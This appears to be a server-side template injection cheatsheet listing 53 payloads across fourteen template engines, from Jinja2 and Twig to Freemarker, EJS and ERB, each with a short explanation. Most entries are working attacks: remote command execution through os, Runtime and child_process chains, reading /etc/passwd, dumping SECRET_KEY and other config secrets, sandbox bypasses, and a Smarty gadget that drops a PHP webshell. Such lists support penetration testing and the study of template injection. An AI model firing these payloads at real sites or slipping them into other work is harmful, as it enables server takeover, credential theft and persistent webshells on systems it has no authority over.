SSTI cheatsheet

53 payloads

• Jinja2 Python Detection Copy

  {{7*7}}

  Why it works: Anything inside {{ }} is evaluated as a Python expression. If the response shows 49, the template is evaluating your input.

• Jinja2 Python Detection Copy

  {{7*'7'}}

  Why it works: Integer × string repeats the string (7777777). Confirms Jinja2/Python and distinguishes it from Twig, which would return 49.

• Jinja2 Python Info & context Copy

  {{ config.items() }}

  Why it works: In Flask, config is in the context and exposes the entire configuration — including SECRET_KEY, which lets you forge sessions.

• Jinja2 Python RCE Copy

  {{ cycler.__init__.__globals__.os.popen('id').read() }}

  Why it works: cycler is a Jinja2 global; via __init__.__globals__ you reach the os module and execute a command.

• Jinja2 Python RCE Copy

  {{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

  Why it works: Classic Flask path: from request to __builtins__.__import__ to import os and run commands.

• Jinja2 Python RCE Copy

  {{ ''.__class__.__mro__[1].__subclasses__() }}

  Why it works: Lists every subclass of object. Find subprocess.Popen (or a file wrapper) and call it by index for RCE or file reads.

• Jinja2 Python Sandbox bypass Copy

  {{ ''|attr('__class__') }}

  Why it works: When the dot (.) is filtered, the attr() filter accesses attributes by string, bypassing the block.

• Jinja2 Python Sandbox bypass Copy

  {{ request['application']['__globals__'] }}

  Why it works: Bracket access ['...'] avoids the dot and blocklists targeting words like __globals__.

• Tornado Python Detection Copy

  {{7*7}}

  Why it works: Tornado also uses {{ }} for expressions. 49 confirms server-side evaluation.

• Tornado Python RCE Copy

  {% import os %}{{ os.popen('id').read() }}

  Why it works: Tornado allows {% import %}; import os and execute commands directly.

• Mako Python Detection Copy

  ${7*7}

  Why it works: Mako evaluates expressions in ${ ... }. 49 confirms the engine.

• Mako Python RCE Copy

  <%import os%>${os.popen('id').read()}

  Why it works: Mako accepts raw Python <% %> blocks; import os and run commands.

• Mako Python RCE Copy

  ${self.module.cache.util.os.system('id')}

  Why it works: Mako's attribute chain reaches os.system without needing a code block.

• Mako Python File read Copy

  ${open('/etc/passwd').read()}

  Why it works: open is reachable in Mako scope; reads arbitrary files from the server.

• Django Python Detection Copy

  {{7|add:7}}

  Why it works: Django does not evaluate free expressions; arithmetic only via filters like add. 14 suggests Django (sandboxed).

• Django Python Info & context Copy

  {% debug %}

  Why it works: The {% debug %} tag dumps available variables and context — information disclosure useful for escalation.

• Django Python Info & context Copy

  {{ settings.SECRET_KEY }}

  Why it works: If settings is in the context, it exposes secrets. In Django, SSTI is usually information disclosure, not direct RCE.

• Twig PHP Detection Copy

  {{7*7}}

  Why it works: Twig evaluates {{ }}. 49 confirms the engine.

• Twig PHP Detection Copy

  {{7*'7'}}

  Why it works: In Twig, 7*'7' yields 49 (not 7777777) — distinguishes it from Jinja2.

• Twig PHP Info & context Copy

  {{ _self }}

  Why it works: _self references the current template; a starting point to reach the Twig environment (_self.env).

• Twig PHP RCE Copy

  {{ ['id']|filter('system') }}

  Why it works: The filter filter applies system to each array item, executing the command.

• Twig PHP RCE Copy

  {{ ['id', 0]|sort('system') }}

  Why it works: sort uses system as the comparison callback, firing the command — an alternative when filter is blocked.

• Twig PHP RCE Copy

  {{ ['id']|map('system')|join }}

  Why it works: map applies system to the array and join materializes the output — another RCE path.

• Twig PHP Sandbox bypass Copy

  {{ _self.env.registerUndefinedFilterCallback('system') }}{{ _self.env.getFilter('id') }}

  Why it works: In Twig 1.x, registers system as the undefined-filter callback and triggers it with the command as the filter name.

• Smarty PHP Detection Copy

  {$smarty.version}

  Why it works: Prints the Smarty version — confirms the engine and guides the exploitation vector.

• Smarty PHP Detection Copy

  {math equation="7*7"}

  Why it works: The {math} tag evaluates the expression; 49 confirms Smarty.

• Smarty PHP RCE Copy

  {php}system('id');{/php}

  Why it works: The {php} tag runs raw PHP (Smarty < 3.1, or when re-enabled).

• Smarty PHP RCE Copy

  {system('id')}

  Why it works: When PHP functions are allowed by the security policy, they can be called directly as a tag.

• Smarty PHP Sandbox bypass Copy

  {Smarty_Internal_Write_File::writeFile("./shell.php","<?php system($_GET['c']); ?>",self::clearConfig())}

  Why it works: Known gadget: Smarty's static writeFile method drops a webshell to disk. self::clearConfig() supplies the Smarty instance reference required as the 3rd argument. Removed in Smarty 3.1.30+.

• Freemarker Java Detection Copy

  ${7*7}

  Why it works: Freemarker evaluates ${ ... }. 49 confirms the engine.

• Freemarker Java RCE Copy

  <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}

  Why it works: Instantiates Freemarker's Execute utility class via ?new() and runs the command.

• Freemarker Java RCE Copy

  ${"freemarker.template.utility.Execute"?new()("id")}

  Why it works: Compact form: creates Execute and invokes it in the same expression.

• Freemarker Java Sandbox bypass Copy

  <#assign v="freemarker.template.utility.ObjectConstructor"?new()>${v("java.lang.ProcessBuilder","id").start()}

  Why it works: When Execute is blocked, ObjectConstructor builds an arbitrary ProcessBuilder to execute commands.

• Velocity Java Detection Copy

  #set($x=7*7)$x

  Why it works: Velocity sets variables with #set; printing 49 confirms the engine.

• Velocity Java RCE Copy

  #set($e="e")
  #set($run=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null))
  $run.exec("id")

  Why it works: Via reflection from a string, reaches java.lang.Runtime and executes OS commands.

• Velocity Java RCE Copy

  #set($run=$class.inspect("java.lang.Runtime").type.getRuntime())
  $run.exec("id")

  Why it works: When the $class tool is exposed in context, it grabs Runtime directly and executes commands.

• Thymeleaf Java Detection Copy

  [[${7*7}]]

  Why it works: In a Thymeleaf/Spring EL expression context, [[...]] evaluates inline; 49 confirms.

• Thymeleaf Java RCE Copy

  ${T(java.lang.Runtime).getRuntime().exec('id')}

  Why it works: Spring EL: T(...) references a static class; Runtime.exec executes the command.

• Thymeleaf Java RCE Copy

  __${T(java.lang.Runtime).getRuntime().exec("id")}__::.x

  Why it works: The __...__ preprocessing of fragment/expression names evaluates the expression — the classic Thymeleaf SSTI via view name.

• Pug Node.js Detection Copy

  #{7*7}

  Why it works: Pug interpolates #{ ... } as JavaScript; 49 confirms server-side evaluation.

• Pug Node.js RCE Copy

  #{global.process.mainModule.require('child_process').execSync('id')}

  Why it works: From global.process you reach require('child_process') and execute commands on Node.

• Pug Node.js RCE Copy

  = global.process.mainModule.require('child_process').execSync('id')

  Why it works: A Pug code line (= expr) executes arbitrary JavaScript on the server.

• EJS Node.js Detection Copy

  <%= 7*7 %>

  Why it works: EJS evaluates <%= ... %> as JavaScript; 49 confirms the engine.

• EJS Node.js RCE Copy

  <%= global.process.mainModule.require('child_process').execSync('id') %>

  Why it works: The JS expression in EJS executes commands via child_process.

• EJS Node.js Sandbox bypass Copy

  ?settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('id');s

  Why it works: CVE-2022-29078: polluting EJS options injects code through the output-function name — RCE without <% %> in the input.

• Handlebars Node.js RCE Copy

  {{#with "s" as |string|}}
    {{#with "e"}}
      {{#with split as |conslist|}}
        {{this.pop}}
        {{this.push (lookup string.sub "constructor")}}
        {{this.pop}}
        {{#with string.split as |codelist|}}
          {{this.pop}}
          {{this.push "return require('child_process').execSync('id');"}}
          {{this.pop}}
          {{#each conslist}}
            {{#with (string.sub.apply 0 codelist)}}
              {{this}}
            {{/with}}
          {{/each}}
        {{/with}}
      {{/with}}
    {{/with}}
  {{/with}}

  Why it works: Handlebars is logic-less, but the #with/lookup/constructor gadget rebuilds a function and reaches require to execute commands (version-dependent).

• ERB Ruby Detection Copy

  <%= 7*7 %>

  Why it works: ERB evaluates <%= ... %> as Ruby; 49 confirms the engine.

• ERB Ruby RCE Copy

  <%= system('id') %>

  Why it works: system executes an operating-system command in Ruby.

• ERB Ruby RCE Copy

  <%= `id` %>

  Why it works: Backticks in Ruby execute the command and return the output — handy to exfiltrate the result.

• ERB Ruby File read Copy

  <%= File.read('/etc/passwd') %>

  Why it works: File.read reads arbitrary files from the server.

• Go Go Detection Copy

  {{ . }}

  Why it works: Go templates print the context with {{ . }}. If it renders the injected struct/data, template evaluation is happening.

• Go Go Info & context Copy

  {{ .Password }}

  Why it works: Accesses fields of the struct passed to the template, leaking sensitive context data.

• Go Go Info & context Copy

  {{ printf "%+v" . }}

  Why it works: printf "%+v" dumps the whole context object. In Go, SSTI rarely becomes RCE (absent a dangerous FuncMap) — focus on information disclosure.

No payloads match these filters.